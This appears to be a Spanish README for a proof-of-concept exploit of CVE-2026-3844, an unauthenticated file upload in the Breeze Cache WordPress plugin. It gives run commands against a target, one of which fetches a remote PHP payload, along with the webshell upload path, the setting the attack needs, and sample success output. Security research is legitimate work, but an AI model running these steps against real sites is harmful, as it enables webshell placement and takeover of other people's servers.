
Prueba de concepto en Python para CVE-2026-3844, una subida arbitraria de archivos sin autenticación en el plugin Breeze Cache de WordPress, que permite la ejecución remota de código. Incluye detección, explotación y verificación de webshell.
Este repositorio contiene un script de prueba de concepto (PoC) en Python para demostrar una vulnerabilidad de Subida Arbitraria de Archivos No Autenticada que afecta al plugin WordPress Breeze Cache <= 2.4.4.
⚠️ Este proyecto está destinado estrictamente a pruebas de seguridad autorizadas, investigación educativa y validación defensiva únicamente.
La vulnerabilidad abusa de la funcionalidad de caché de gravatar de Breeze Cache para almacenar archivos controlados por el atacante dentro del directorio de caché de WordPress.
pycurltermcolorInstalar dependencias:
pip install pycurl termcolor
| Archivo | Descripción |
|---|---|
CVE-2026-3844.py | Script principal del PoC |
CVE-2026-3844.yaml | Plantilla/configuración YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
El script realiza los siguientes pasos:
El payload subido puede volverse accesible desde:
/wp-content/cache/breeze-extra/gravatars/
La explotación exitosa puede depender de que la siguiente configuración de Breeze esté habilitada:
Host Files Locally - Gravatars
Si la función está deshabilitada, los intentos de explotación pueden fallar.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
Este repositorio se proporciona para:
No utilice este proyecto contra sistemas que no posea o para los que no tenga permiso explícito de prueba.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este proyecto.
Los administradores de sitios web deberían:
/wp-content/cache/ en busca de archivos sospechososEsta prueba de concepto fue creada para ayudar a:
a comprender los riesgos de seguridad asociados con mecanismos de caché inseguros y subidas arbitrarias de archivos.
Proyecto Educativo / Investigación de Seguridad